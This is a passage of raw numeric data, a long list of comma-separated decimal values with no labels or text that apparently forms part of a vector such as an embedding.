0.024590063840150833, -0.008857711218297482, -0.0016826929058879614, 0.0056809112429618835, -0.020095106214284897, 0.00687075313180685, -0.02322135679423809, 0.007866176776587963, -0.0007154604536481202, 0.001455223187804222, -0.03931921720504761, 0.014806919731199741, -0.01654891110956669, 0.004203329794108868, 0.013974808156490326, 0.0048449113965034485, -0.013088259845972061, -0.041652239859104156, 0.04830913245677948, -0.016937747597694397, -0.0381060428917408, -0.02564770169556141, 0.008235571905970573, 0.041403383016586304, 0.007189599797129631, -0.022428128868341446, 0.04121674224734306, 0.011081859469413757, 0.025896556675434113, 0.0841754749417305, -0.01439475268125534, -0.013967031612992287, -0.006322492845356464, 0.013850380666553974, 0.012761636637151241, 0.005700353067368269, 0.01244278997182846, -0.0018003161530941725, -0.03028264082968235, 0.05297517776489258, -0.02704751491546631, 0.007986715994775295, 0.044731829315423965, 0.01810425892472267, -0.0014484184794127941, -0.020281746983528137, -0.013967031612992287, -0.009378752671182156, 0.0038417114410549402, 0.005719794891774654, -0.03689287230372429, -0.04690931737422943, -0.007454008795320988, 0.01049082726240158, -0.051233187317848206, -0.03782608360052109, 0.02368796244263649, -0.03487091884016991, 0.006287497468292713, -0.021214956417679787, 0.03158913180232048, -0.02434120886027813, 0.02154158055782318, 0.012333915568888187, -0.022723644971847534, 0.006909636780619621, 0.012092836201190948, -0.02099720761179924, -0.032195720821619034, 0.01114407368004322, 0.026160966604948044, 0.004615497309714556, -0.019535180181264877, 0.006404148414731026, 0.044638510793447495, 0.0012296976055949926, -0.009588724933564663, -0.006761878728866577, -0.02406124584376812, 0.015615701675415039, -0.01463583204895258, -0.01726437173783779, 0.02146381326019764, 0.006089190486818552, 0.009378752671182156, -0.011890641413629055, 0.009402083232998848, 0.02230370044708252, -0.013523757457733154, 0.018804166465997696, -0.0035073114559054375, -0.015141320414841175, 0.0028521206695586443, -0.0041061206720769405, -0.002025841735303402, 0.009184334427118301, -0.005494269542396069, -0.0118050966411829, 0.015872333198785782, -0.023470213636755943, -0.005677022971212864, -0.030515942722558975, 0.011042975820600986, 0.0002058406826108694, -0.02413901314139366, -0.010436390526592731, -0.012302808463573456, 0.03630184009671211, 0.008717729710042477, 0.00422277208417654, 0.05835668370127678, -0.008982138708233833, -0.010031999088823795, 0.003326502162963152, 0.010661915875971317, -0.01207728311419487, -0.0021347161382436752, -0.02340799942612648, 0.014037022367119789, -0.000794686027802527, -0.025849895551800728, -0.004098344128578901, -0.0015310464659705758, -0.012839403934776783, -0.019193002954125404, -0.015615701675415039, 0.009440966881811619, 0.029893802478909492, 0.02936498448252678, 0.0055837021209299564, 0.004977115895599127, -0.02701640874147415, 0.00026343719218857586, -0.001618534792214632, -0.026316501200199127, -0.03829268738627434, 0.01969071477651596, 0.016580017283558846, -0.021977078169584274, -0.0307492446154356, -0.0350886695086956, -0.017575440928339958, 0.010164204053580761, 0.011696222238242626, 0.0043705301359295845, -0.022692538797855377, 0.007135162595659494, -0.011906194500625134, -0.03222682699561119, 0.01969071477651596, 0.019675161689519882, -0.01463583204895258, 0.001700190594419837, -0.02054615691304207, 0.013119366951286793, -0.004778808914124966, -0.002263032365590334, -0.009223218075931072, 0.001330795232206583, 0.006890194956213236, -0.012536111287772655, -0.0028540650382637978, -0.022241488099098206, 0.014659161679446697, 0.04302094504237175, -0.047344814985990524, -0.0369550846517086, 0.011354045942425728, 0.01726437173783779, 0.019021915271878242, -0.02488557994365692, 0.002883227774873376, -0.014254771173000336, 0.010148650966584682, -0.00881882756948471, -0.005260967183858156, -0.015607925131917, 0.0017565720481798053, 0.0007334441761486232, 0.005498157814145088, 0.010599701665341854, -0.03309782221913338, -0.01664223149418831, -0.008756613358855247, -0.012411682866513729, 0.020297301933169365, -0.011260724626481533, -0.009534288197755814, 0.006244725082069635, 0.0015728464350104332, -0.013998138718307018, 0.013990362174808979, 0.0022824741899967194, -0.026783104985952377, 0.01644003577530384, -0.022910287603735924, 0.010405283421278, -0.024325653910636902, 0.007978939451277256, -0.04345644265413284, 0.013500426895916462, 0.007275143638253212, -0.03222682699561119, 0.0444207601249218, -0.0048954603262245655, 0.028027385473251343, -0.00638859486207366, 0.020483942702412605, 0.0037736648228019476, 0.020966101437807083, -0.014449190348386765, 0.012388353236019611, -0.0017867068527266383, 0.019364092499017715, 0.0010177813237532973, -0.01203062292188406, -0.036550696939229965, 0.0022571999579668045, 0.01105852983891964, -0.009822027757763863, -0.012497227638959885, -0.011921748518943787, 0.02964494749903679, -0.051419828087091446, -0.0037717206869274378, -0.02667423151433468, 0.0317913293838501, -0.01398258563131094, -0.026705337688326836, 0.02581878937780857, -0.02480781264603138, -0.011851757764816284, -0.017419906333088875, 0.032009076327085495, -0.012940501794219017, -0.02144826017320156, 0.037763867527246475, -0.000461744173662737, 0.016315609216690063, 0.03065592423081398, 0.005614809226244688, 0.016704445704817772, -0.04121674224734306, 0.012823850847780704, 0.019472965970635414, 0.045665040612220764, 0.02314358949661255, -0.015491273254156113, -0.03197797015309334, -0.04896237701177597, 0.01709328219294548, -0.00905990693718195, 0.02714083530008793, 0.020312855020165443, -0.010304185561835766, -0.04053238779306412, 0.03829268738627434, -0.03938142955303192, -0.01440252922475338, -0.0003079104353673756, -0.038137152791023254, -0.004728260450065136, -0.03149581328034401, 0.02488557994365692, -0.009223218075931072, 0.015537934377789497, 0.013920371420681477, 0.0005093766958452761, -0.018182026222348213, 0.011727329343557358, 0.03549305722117424, -0.026612017303705215, 0.015677915886044502, 0.009736482985317707, -0.006415813695639372, 0.025601040571928024, -0.005311516113579273, 0.03919478878378868, -0.008383329957723618, -0.03403102979063988, -0.004813804291188717, -0.00887326430529356, 0.00037790113128721714, -0.016020093113183975, -0.032569002360105515, -0.025943217799067497, -0.016284501180052757, -0.01698440872132778, -0.0017487952718511224, 0.010358622297644615, -0.003437320701777935, -0.0175443347543478, 0.0019412696128711104, -0.004424967337399721, -0.021106082946062088, -0.010988539084792137, 0.00027169997338205576, -0.007170157972723246, -0.009223218075931072, -0.011066306382417679, -0.028260687366127968, 0.03151136636734009, -0.0460694283246994, -0.008577748201787472, -0.012753860093653202, -0.016097860410809517, -0.003690064884722233, -0.012209488078951836, -0.018182026222348213, -0.024730045348405838, -0.0025099441409111023, -0.01858641766011715, 0.031138082966208458, 0.001766292960382998, -0.03009599819779396, -0.03076479770243168, -0.036644015461206436, -0.009829804301261902, -0.014534734189510345, -0.008842158131301403, -0.0023252463433891535, 0.0013774557737633586, -0.014705822803080082, 0.044451866298913956, -0.017451012507081032, 0.00012770871398970485, -0.02174377627670765, 0.013640408404171467, 0.0013881487539038062, -0.005424278788268566, -0.0019101627403870225, -0.01699996180832386, -0.01959739439189434, -0.017684316262602806, -0.007325692567974329, -0.013795943930745125, 0.05266410857439041, 0.02182154357433319, -0.022132612764835358, 0.024372315034270287, 0.0293494313955307, -0.013080483302474022, -0.009744259528815746, -0.006050306838005781, -0.009277655743062496, 0.025694360956549644, 0.020670585334300995, -0.014534734189510345, 0.009588724933564663, 0.013399329967796803, -0.001701162662357092, 0.04034574702382088, -0.016300054267048836, 0.0038767068181186914, 0.004179999697953463, -0.016331162303686142, -0.048651307821273804, 0.024325653910636902, -0.01681331917643547, 0.011291831731796265, -0.011929525062441826, 0.00849220436066389, 0.002772409236058593, -0.02889838069677353, 0.002313581295311451, -0.006201953161507845, -0.024045690894126892, 0.010109767317771912, -0.03418656438589096, -0.03648848086595535, -0.025943217799067497, -0.018353115767240524, 0.010257525369524956, -0.018788613379001617, -0.010630808770656586, 0.018415329977869987, 0.0176532082259655, 0.002424399834126234, 0.016035646200180054, 0.0012219208292663097, -0.0101719805970788, 0.005801450926810503, -0.007438455242663622, -0.03499534726142883, 0.03770165517926216, 0.0032098509836941957, -0.02441897615790367, 0.010273078456521034, -0.020872781053185463, 0.008142250590026379, 0.019348539412021637, -0.004949897527694702, 0.042492128908634186, -0.012201710604131222, -0.016020093113183975, -0.017419906333088875, -0.015623478218913078, -0.012333915568888187, -0.028447328135371208, 0.03900814801454544, -0.023921264335513115, -0.003970027901232243, -0.02129272371530533, -0.0026499254163354635, 0.015164650045335293, -0.007115720771253109, -0.014978008344769478, -0.009036576375365257, 0.024574510753154755, 0.028571756556630135, -0.03399992361664772, 0.03829268738627434, 0.0075434413738548756, 0.03000267781317234, -0.015771236270666122, -0.0035364741925150156, -0.04022131860256195, -0.024590063840150833, -0.01462805550545454, -0.02833845466375351, 0.009378752671182156, 0.009355423040688038, -0.01277718972414732, -0.01617562770843506, 0.05110875889658928, -0.03527531027793884, 0.010280855000019073, -0.02368796244263649, -0.01235724613070488, 0.021883757784962654, -0.0202350877225399, -0.004094455391168594, 0.015032446011900902, 0.0031767997425049543, -0.00012940987653564662, 0.03670623153448105, 0.008010046556591988, 0.013764836825430393, -0.014830250293016434, 0.02516554296016693, 0.02359464019536972, 0.01755988784134388, 0.01718660444021225, -0.012287255376577377, 0.0029007254634052515, 0.007473450619727373, 0.03381328284740448, 0.010623032227158546, 0.02043728344142437, -0.00979869719594717, 0.007768967188894749, -0.0058947717770934105, -0.004541618283838034, 0.0008875209023244679, -0.04560282453894615, 0.007916725240647793, 0.004911013878881931, 0.04227437824010849, 0.0008039209060370922, -0.03471538424491882, 0.007590102031826973, -0.007006846368312836, 0.02525886334478855, 0.003149581141769886, 0.008196688257157803, -0.026440929621458054, 0.010265301913022995, 0.014791366644203663, 0.004942120518535376, 0.035244204103946686, -0.020701691508293152, 0.002957106800749898, -0.0008812022861093283, -0.0014075905783101916, 0.002128883497789502, 0.016191180795431137, 0.026176519691944122, -0.01049082726240158, -0.01654891110956669, 0.00617862306535244, -0.010031999088823795, -0.02193041704595089, -0.023174695670604706, -0.0021172184497117996, 0.014853580854833126, -0.0018809998873621225, 0.020328408107161522, 0.00008287092350656167, 0.02043728344142437, -0.011657338589429855, -0.021137189120054245, 0.0026285394560545683, -0.020857226103544235, -0.00423054862767458, -0.0163622684776783, 0.015351292677223682, -0.008258901536464691, -0.0022960836067795753, -0.016206733882427216, 0.01662667840719223, -0.0008632185636088252, -0.029302770271897316, 0.00769119942560792, -0.003886427730321884, 0.007442343980073929, -0.00009878895070869476, -0.001862530130892992, -0.02426343970000744, -0.0137415062636137, 0.0147291524335742, -0.022925840690732002, -0.018726399168372154, 0.007104055490344763, -0.014340315945446491, 0.07198154181241989, 0.009067683480679989, -0.023003607988357544, -0.004514399915933609, -0.010343069210648537, -0.019815143197774887, -0.021494919434189796, 0.017108837142586708, 0.00585199985653162, -0.007555106654763222, 0.024185672402381897, -0.00005996598702040501, -0.0005205557681620121, -0.022272594273090363, -0.0014659161679446697, -0.005447608884423971, 0.0049810041673481464, -0.01978403702378273, 0.016859980300068855, 0.011812874116003513, -0.001744906883686781, 0.010405283421278, 0.006929078605026007, -0.003977804444730282, 0.007772855460643768, -0.018975254148244858, 0.009456520900130272, -0.011540687642991543, -0.024216780439019203, -0.028089597821235657, -0.02824513427913189, -0.00033707323018461466, 0.009448743425309658, 0.004992669448256493, -0.0181198138743639, 0.007104055490344763, 0.013018269091844559, 0.009510957635939121, -0.008212241344153881, -0.004996557720005512, 0.004008911550045013, 0.0056070322170853615, 0.0025915999431163073, -0.02063947729766369, -0.01505577564239502, -0.02804293856024742, 0.038603756576776505, 0.004071125295013189, -0.01411478966474533, -0.019286325201392174, -0.007504557725042105, -0.03409324586391449, 0.009658715687692165, 0.044918473809957504, -0.003730892902240157, 0.008966585621237755, -0.008997692726552486, -0.01746656745672226, 0.020032892003655434, -0.02925611101090908, 0.017202157527208328, 0.0028521206695586443, 0.024310100823640823, 0.023019161075353622, 0.014495850540697575, -0.026332054287195206, -0.03160468488931656, 0.02742079831659794, 0.012854957021772861, 0.0036920090205967426, 0.003719227621331811, -0.019286325201392174, -0.0038475440815091133, -0.013212687335908413, -0.006135850679129362, 0.019084129482507706, -0.029116129502654076, -0.016393376514315605, -0.016035646200180054, -0.007578436750918627, 0.014145896770060062, 0.012209488078951836, 0.006423590239137411, 0.021510472521185875, -0.0163622684776783, -0.016844427213072777, 0.009744259528815746, -0.0008904371643438935, 0.014410305768251419, -0.027203049510717392, 0.005762567277997732, -0.009207664988934994, 0.009052129462361336, -0.006268055643886328, -0.005260967183858156, -0.014939124695956707, 0.022521449252963066, -0.019006362184882164, -0.01673555187880993, -0.013181581161916256, 0.003643404459580779, 0.004125562496483326, 0.03449763357639313, -0.01617562770843506, -0.01895970106124878, 0.008919925428926945, -0.01206950657069683, 0.006987404078245163, 0.011260724626481533, -0.013827050104737282, -0.017342139035463333, -0.0029085022397339344, -0.0058947717770934105, -0.04799806326627731, -0.015436836518347263, -0.009277655743062496, 0.005416502244770527, -0.00001528768007119652, 0.011641785502433777, -0.02219482697546482, -0.02843177504837513, -0.001064441748894751, 0.008632185868918896, -0.03057815693318844, 0.0031884650234133005, 0.01746656745672226, -0.019301878288388252, -0.022832520306110382, 0.020141765475273132, 0.05005112290382385, 0.0162533950060606, 0.010685245506465435, 0.016237841919064522, -0.03754612058401108, 0.02714083530008793, -0.01398258563131094, 0.005467050708830357, -0.012512780725955963, 0.022552557289600372, 0.012691645883023739, -0.021883757784962654, 0.031075868755578995, 0.001543683698400855, 0.024403421208262444, 0.026596464216709137, -0.017684316262602806, -0.01175065990537405, 0.018975254148244858, 0.012979385443031788, 0.004685488063842058, -0.0033381672110408545, -0.01082522701472044, 0.01616007275879383, 0.004502734635025263, 0.02927166409790516, -0.0013832882978022099, 0.002513832412660122, -0.031449150294065475, 0.004771032370626926, -0.000757746456656605, -0.004502734635025263, 0.02695419453084469, 0.008881041780114174, 0.007146827410906553, 0.0031826323829591274, 0.00519875343888998, -0.005015999544411898, -0.01763765513896942, -0.013928147964179516, 0.0008515534573234618, 0.005404836963862181, -0.009067683480679989, -0.027109729126095772, -0.01998623088002205, 0.005058771930634975, -0.004537730012089014, -0.019675161689519882, -0.0010381953325122595, 0.0030562602914869785, -0.015537934377789497, -0.01791761815547943, 0.0261920727789402, -0.015957878902554512, -0.003651181235909462, 0.03816825896501541, -0.002076390665024519, 0.0018119813175871968, -0.025134436786174774, -0.004047795198857784, 0.005272632464766502, 0.018353115767240524, 0.022505896165966988, -0.0006187371909618378, -0.021992631256580353, -0.010350845754146576, -0.010902995243668556, -0.011672892607748508, 0.012551664374768734, 0.00985313393175602, -0.028556203469634056, -0.00919988751411438, -0.009044352918863297, -0.00841443706303835, 0.001796427764929831, 0.014651385135948658, -0.018073152750730515, -0.010218641720712185, -0.00005410304947872646, -0.018928594887256622, -0.013321561738848686, -0.008632185868918896, -0.0095265107229352, 0.0003902953176293522, 0.02871173806488514, 0.022225933149456978, 0.02770076133310795, 0.0007028232212178409, -0.029800482094287872, 0.01978403702378273, 0.027902957051992416, -0.007741748355329037, -0.010871888138353825, 0.004211106803268194, -0.00042747787665575743, -0.011525134555995464, -0.017342139035463333, 0.029504965990781784, -0.004701041616499424, -0.007275143638253212, 0.012932725250720978, 0.018881933763623238, 0.011439589783549309, 0.02749856561422348, -0.0027899069245904684, 0.00022273079957813025, -0.012613878585398197, -0.014978008344769478, -0.009627608582377434, 0.0025002232287079096, -0.00243800925090909, -0.0015475719701498747, 0.02843177504837513, -0.02766965515911579, 0.014278101734817028, 0.008033376187086105, -0.0002668395172804594, 0.030251532793045044, 0.034062135964632034, -0.009596501477062702, 0.029287217184901237, -0.010335292667150497, 0.018430883064866066, -0.009122120216488838, -0.0036920090205967426, -0.0077845207415521145, 0.02116829715669155, 0.021214956417679787, -0.014433636330068111, 0.018601970747113228, -0.01617562770843506, 0.008616631850600243, -0.0022591440938413143, -0.02129272371530533, 0.01013309694826603, -0.011641785502433777, -0.006913525052368641, 0.008391106501221657, -0.007084613665938377, -0.025212204083800316, 0.01987735740840435, -0.02060837112367153, -0.007294585462659597, 0.009728706441819668, 0.010638585314154625, -0.02323690988123417, 0.0015388231258839369, 0.0008510674233548343, -0.037763867527246475, -0.02193041704595089, 0.009557617828249931, 0.0267675518989563, 0.03875929117202759, 0.0035947998985648155, 0.00764453923329711, -0.002589655574411154, 0.01588011160492897, -0.005817004479467869, -0.02239702269434929, -0.0012141441693529487, -0.01606675237417221, 0.01143181324005127, -0.005937543697655201, -0.012419459410011768, -0.027887403964996338, -0.004335534758865833, 0.007275143638253212, -0.006310827564448118, 0.04264766350388527, 0.018975254148244858, -0.014239218086004257, 0.004075013566762209, 0.008764389902353287, 0.0325067900121212, 0.009355423040688038, 0.002352464944124222, 0.00423054862767458, 0.0005259023164398968, -0.01819758117198944, 0.021121636033058167, -0.006513022817671299, 0.014145896770060062, -0.02460561692714691, -0.015747906640172005, -0.024310100823640823, 0.0061319624073803425, 0.006252502091228962, -0.011626232415437698, 0.017108837142586708, 0.01109741348773241, -0.018804166465997696, 0.024870026856660843, 0.025849895551800728, -0.007963385432958603, -0.028493989259004593, -0.016315609216690063, -0.0061825113371014595, 0.002469116123393178, -0.00015456278924830258, 0.004891572054475546, 0.006524688098579645, 0.023625748232007027, -0.0028521206695586443, 0.015514603815972805, 0.011501803994178772, 0.014363645575940609, -0.012854957021772861, -0.0071312738582491875, 0.01875750534236431, -0.013477097265422344, -0.022879179567098618, -0.01886638067662716, 0.026736445724964142, -0.03306671604514122, 0.014099236577749252, 0.00984535738825798, 0.006209729705005884, 0.018897486850619316, 0.017062176018953323, -0.010358622297644615, -0.02555437944829464, -0.016206733882427216, -0.008935478515923023, -0.022894734516739845, -0.000022221438484848477, 0.009650939144194126, 0.026456482708454132, 0.008266679011285305, -0.002918223151937127, -0.011182957328855991, 0.009277655743062496, -0.012186157517135143, -0.008251124992966652, -0.0007757301791571081, -0.0011111022904515266, -0.02525886334478855, -0.0025410510133951902, -0.0009045324986800551, -0.0040594604797661304, 0.008554418571293354, -0.016782213002443314, -0.005824781022965908, 0.010941878892481327, -0.003458706894889474, 0.006824092473834753, -0.003120418405160308, 0.019830696284770966, 0.035617485642433167, -0.003672567196190357, -0.007310139015316963, 0.026985300704836845, -0.0020044557750225067, -0.023485766723752022, 0.024761151522397995, -0.021790435537695885, -0.016486696898937225, -0.006586901843547821, -0.004829357843846083, 0.022505896165966988, 0.021106082946062088, 0.0009900766890496016, 0.013718175701797009, 0.01272275298833847, 0.00703795300796628, 0.00846109725534916, 0.02045283652842045, -0.010941878892481327, 0.008344446308910847, -0.009207664988934994, -0.01913079060614109, -0.0029396091122180223, 0.003657013876363635, 0.013080483302474022, -0.02144826017320156, 0.020732799544930458, 0.01755988784134388, -0.004732148721814156, -0.0007771883392706513, -0.015607925131917, 0.02060837112367153, 0.003777553327381611, 0.009293208830058575, -0.0130960363894701, 0.017715422436594963, -0.009542064741253853, 0.010405283421278, -0.0021619347389787436, -0.005490381270647049, -0.0007485115784220397, -0.012053952552378178, 0.01175843644887209, -0.002068613888695836, -0.01793317124247551, -0.000591032556258142, -0.01838422194123268, 0.03291118144989014, -0.0013687069294974208, 0.005883106496185064, -0.021137189120054245, 0.0020880557131022215, 0.024823365733027458, -0.010070882737636566, 0.046971533447504044, -0.008951032534241676, -0.01235724613070488, -0.016377821564674377, -0.027825189754366875, -0.01634671539068222, -0.0126838693395257, -0.012948278337717056, -0.0078933946788311, -0.010739683173596859, -0.013764836825430393, -0.00039272557478398085, -0.005272632464766502, 0.00881882756948471, -0.0008656487916596234, 0.00845332071185112, -0.00850775744765997, 0.0008792580920271575, 0.003073757980018854, 0.038510434329509735, -0.0032409578561782837, 0.001983069581910968, 0.010934101417660713, 0.0004272348596714437, -0.0006989348330534995, 0.030329300090670586, -0.011175180785357952, -0.003081534756347537, 0.015592371113598347, 0.006812427658587694, -0.021214956417679787, 0.006812427658587694, -0.009254325181245804, 0.019255217164754868, 0.00292599992826581, 0.001011948799714446, -0.006236948538571596, -0.007870065048336983, -0.032848965376615524, 0.0175443347543478, -0.01434809248894453, 0.007061283569782972, 0.00503933010622859, -0.0057314601726830006, 0.0027743533719331026, -0.0184775423258543, -0.014418083243072033, 0.026363162323832512, 0.013251570984721184, 0.01681331917643547, 0.013601524755358696, 0.0021463811863213778, -0.013461543247103691, -0.013609301298856735, 0.06299162656068802, 0.014892464503645897, 0.025414397940039635, -0.0022513673175126314, 0.007555106654763222, -0.0008564139134250581, -0.0010002836352214217, -0.013368222862482071, 0.01738879829645157, 0.0032992835622280836, 0.01203062292188406, 0.0062330602668225765, 0.01718660444021225, 0.021961525082588196, 0.021012762561440468, 0.008336669765412807, -0.00325067900121212, 0.016673339530825615, -0.008111143484711647, 0.0007844790234230459, -0.013026045635342598, -0.006835757754743099, -0.0022649767342954874, 0.026907533407211304, -0.009332092478871346, 0.012536111287772655, 0.0011363766388967633, 0.01235724613070488, 0.009378752671182156, -0.00035529996966943145, -0.009402083232998848, -0.014340315945446491, -0.007271255366504192, -0.02174377627670765, -0.00905990693718195, 0.008951032534241676, 0.006423590239137411, 0.019177449867129326, -0.012201710604131222, 0.010568594560027122, -0.0027762975078076124, -0.006120297126471996, 0.0010731905931606889, -0.007792297285050154, 0.0012705255066975951, 0.005062660202383995, 0.005035441368818283, -0.005190976429730654, -0.019752928987145424, 0.006691887974739075, -0.006450809072703123, 0.00038349066744558513, 0.008647738955914974, 0.025616593658924103, -0.009923124685883522, 0.012854957021772861, -0.011260724626481533, 0.010475274175405502, 0.02785629592835903, 0.0034120462369173765, -0.019301878288388252, 0.002793795196339488, -0.008352222852408886, -0.011913971044123173, 0.015040222555398941, -0.01830645464360714, -0.011742883361876011, -0.0051093208603560925, -0.013166027143597603, -0.0027082511223852634, 0.016859980300068855, 0.011649562045931816, 0.020001785829663277, -0.01644003577530384, 0.01653335802257061, -0.0035870231222361326, 0.0008102394640445709, 0.020421728491783142, -0.0008165580802597106, 0.004852687940001488, 0.012746082618832588, 0.006796874105930328, 0.017684316262602806, -0.006594678852707148, -0.017699869349598885, 0.011299608275294304, -0.0009366115555167198, -0.027156388387084007, 0.002298027742654085, 0.01922411099076271, 0.0004996557836420834, -0.012567218393087387, 0.009021022357046604, 0.02266143076121807, -0.001975292805582285, 0.007422902155667543, 0.0026946417056024075, -0.012497227638959885, -0.003244846360757947, -0.0022727532777935266, -0.009293208830058575, 0.0147291524335742, -0.0016574185574427247, -0.00519875343888998, 0.0070185111835598946, -0.004145004320889711, -0.012015068903565407, -0.022334808483719826, -0.004164446145296097, -0.03188464790582657, 0.000033233427529921755, -0.015257971361279488, -0.012746082618832588, 0.015405729413032532, -0.002873506862670183, 0.010980762541294098, 0.022319255396723747, -0.01011754386126995, -0.005560372024774551, -0.003060148563235998, 0.030173765495419502, 0.021214956417679787, 0.008709953166544437, -0.02462117001414299, -0.007244036998599768, 0.012139497324824333, -0.01375705935060978, 0.004673822782933712, 0.005817004479467869, 0.01049082726240158, 0.02017287351191044, 0.020359516143798828, 0.011882864870131016, -0.014099236577749252, 0.0016000650357455015, 0.0034645393025130033, 0.02015732042491436, 0.007030176464468241, -0.00008542266732547432, -0.0037814415991306305, -0.00873328372836113, 0.02118385024368763, 0.0069446321576833725, 0.003952530212700367, 0.002653813920915127, -0.008616631850600243, 0.03651958703994751, 0.003147637005895376, -0.0007115720654837787, 0.01375705935060978, 0.011672892607748508, 0.0036161858588457108, 0.01829090155661106, -0.013920371420681477, -0.0038533764891326427, -0.0014250882668420672, -0.014838026836514473, 0.0035073114559054375, 0.013274901546537876, -0.0216349009424448, -0.0007956580957397819, -0.0037483905907720327, -0.00784284621477127, 0.005377618130296469, 0.004148892592638731, 0.014511403627693653, 0.02062392421066761, -0.0036161858588457108, 0.010031999088823795, 0.01434809248894453, -0.01179732009768486, -0.025585487484931946, -0.001862530130892992, 0.01207728311419487, 0.00459994375705719, 0.000550690689124167, -0.0031165301334112883, 0.014892464503645897, -0.0024593952111899853, 0.007380129769444466, 0.007768967188894749, -0.014698045328259468, -0.004323869477957487, 0.012263924814760685, 0.021230511367321014, -0.014985784888267517, 0.050393298268318176, 0.009938678704202175, -0.007139050867408514, -0.011206287890672684, -0.009915348142385483, -0.014503627084195614, -0.003075702115893364, -0.03029819391667843, -0.01072413008660078, -0.0007791325333528221, 0.0059958696365356445, -0.010288632474839687, -0.0021405487786978483, -0.00877994392067194, -0.026129858568310738, -0.013772613368928432, 0.01049082726240158, 0.0009847301989793777, -0.029847143217921257, 0.007718418259173632, -0.008842158131301403, 0.0078078508377075195, 0.007819515652954578, 0.006400260142982006, -0.02925611101090908, -0.006361376494169235, 0.012854957021772861, -0.01701551489531994, 0.001315241795964539, 0.0012520557502284646, -0.005533153191208839, -0.012100613676011562, -0.00573923671618104, -0.022552557289600372, 0.026363162323832512, 0.0006731743924319744, 0.002838511485606432, -0.012333915568888187, -0.02423233352601528, 0.022801412269473076, -0.002070558024570346, 0.015195757150650024, -0.0009652883163653314, -0.00394669733941555, 0.007356799673289061, -0.004102232400327921, -0.014449190348386765, 0.00487601850181818, -0.0006114465068094432, -0.00302904169075191, 0.01133849285542965, -0.008072259835898876, -0.005883106496185064, -0.00009872818918665871, -0.001123739522881806, -0.025601040571928024, -0.00585588812828064, 0.002426343970000744, 0.01598898507654667, 0.02200818434357643, -0.0016301999567076564, 0.019550733268260956, 0.012178380973637104, -0.000028676742658717558, -0.003952530212700367, -0.005015999544411898, -0.009005469270050526, -0.009930902160704136, 0.010467496700584888, 0.028307346627116203, 0.005424278788268566, -0.018788613379001617, 0.006431367248296738, -0.023921264335513115, -0.012714976444840431, 0.00923877116292715, -0.011952855624258518, -0.0071818227879703045, 0.024558957666158676, 0.0038922603707760572, 0.010980762541294098, 0.005225971806794405, 0.010980762541294098, -0.01645559072494507, 0.009409859776496887, -0.01821313425898552, -0.0005754790618084371, 0.02193041704595089, 0.00683186948299408, 0.003997246269136667, -0.008974362164735794, 0.0021755441557615995, -0.012808296829462051, 0.01212394330650568, 0.027203049510717392, -0.015071329660713673, -0.01931743137538433, -0.025492165237665176, -0.012994938530027866, -0.006112520582973957, 0.009923124685883522, 0.025212204083800316, 0.011937301605939865, 0.022816965356469154, 0.002844344126060605, 0.015040222555398941, -0.007135162595659494, -0.0008510674233548343, 0.007123497314751148, -0.0020666697528213263, -0.0039058695547282696, -0.0052687437273561954, 0.003237069584429264, 0.004736036993563175, 0.0022649767342954874, 0.0005278465105220675, 0.014200334437191486, 0.01979959011077881, -0.02378128282725811, 0.010638585314154625, 0.016284501180052757, -0.001765320892445743, -0.00475936708971858, 0.005474827717989683, 0.0001015229572658427, 0.007080725394189358, 0.007146827410906553, -0.0010654139332473278, 0.00197432073764503, 0.004040018189698458, 0.002912390511482954, -0.013671515509486198, -0.018244240432977676, 0.006163069512695074, -0.006166957784444094, -0.006590790580958128, 0.008904371410608292, -0.0006979627651162446, 0.007088501937687397, 0.0007028232212178409, 0.0008641906315460801, -0.00003590668347897008, -0.00015978778537828475, 0.014558064751327038, 0.012326139025390148, -0.017855403944849968, -0.0028618418145924807, 0.02917834185063839, -0.004786585923284292, 0.005218195263296366, -0.001116934814490378, 0.022365914657711983, 0.006897971965372562, -0.0032720649614930153, 0.00919988751411438, 0.025056667625904083, -0.019084129482507706, 0.013344892300665379, -0.005074325483292341, -0.02200818434357643, 0.004778808914124966, -0.006897971965372562, -0.0009652883163653314, -0.0016058975597843528, 0.011408482678234577, -0.00703406473621726, -0.030438175424933434, 0.011074082925915718, 0.0034723160788416862, 0.010965208522975445, 0.01310381293296814, 0.018057599663734436, -0.0006153348367661238, -0.006917413789778948, 0.006653004325926304, -0.0036414603237062693, 0.0026965858414769173, 0.0030251534190028906, 0.010506381280720234, 0.0222103800624609, -0.0017828184645622969, -0.006687999702990055, -0.019846249371767044, -0.0048954603262245655, 0.014830250293016434, 0.0014746650122106075, -0.026269840076565742, -0.006408036686480045, 0.006415813695639372, 0.03216461092233658, 0.012792743742465973, 0.020701691508293152, -0.00459605548530817, -0.007730083540081978, 0.03300449997186661, -0.01072413008660078, -0.01528907846659422, -0.03474649041891098, -0.0066802226938307285, -0.01147069688886404, 0.005762567277997732, 0.01207728311419487, -0.010413059964776039, 0.005315404385328293, -0.012800520285964012, 0.012155050411820412, -0.00979869719594717, -0.01941075176000595, -0.00035116859362460673, 0.005490381270647049, 0.007827292196452618, -0.008422213606536388, -0.010210864245891571, 0.002717972034588456, -0.007963385432958603, -0.013990362174808979, 0.003244846360757947, 0.010436390526592731, 0.010148650966584682, -0.004514399915933609, 0.0124505665153265, -0.019177449867129326, 0.0045843906700611115, -0.0028851719107478857, 0.019924016669392586, -0.010716352611780167, 0.0007698976551182568, 0.009122120216488838, 0.021572686731815338, -0.004413302056491375, -0.023983478546142578, -0.004117785952985287, 0.0035909113939851522, 0.004666046239435673, -0.01886638067662716, -0.012831627391278744, -0.0124505665153265, 0.0076212091371417046, 0.02563214674592018, 0.009682046249508858, -0.0010002836352214217, -0.0004316092818044126, 0.0018946091877296567, 0.03751501068472862, -0.012007292360067368, -0.015662362799048424, -0.024465635418891907, -0.0006274860352277756, 0.01626894809305668, 0.006050306838005781, 0.0010080604115501046, 0.005914213601499796, 0.03067147731781006, -0.018073152750730515, 0.007609543856233358, 0.004957674071192741, -0.03216461092233658, -0.013850380666553974, -0.027358584105968475, -0.030733691528439522, 0.015343515202403069, 0.017124390229582787, 0.014526957646012306, -0.03207129240036011, 0.030858119949698448, 0.00027072790544480085, -0.0181198138743639, -0.013477097265422344, 0.0032176277600228786, 0.01989291049540043, -0.00007132731843739748, 0.007457897067070007, -0.018353115767240524, -0.014511403627693653, -0.015755683183670044, -0.006936855614185333, -0.0025624369736760855, 0.007745636627078056, -0.006987404078245163, 0.004288874100893736, -0.036177411675453186, -0.0066063436679542065, -0.004736036993563175, -0.01653335802257061, -0.009658715687692165, 0.011828427202999592, 0.004860464949160814, 0.010031999088823795, -0.014324761927127838, 0.00585199985653162, -0.003923367243260145, 0.01903746835887432, 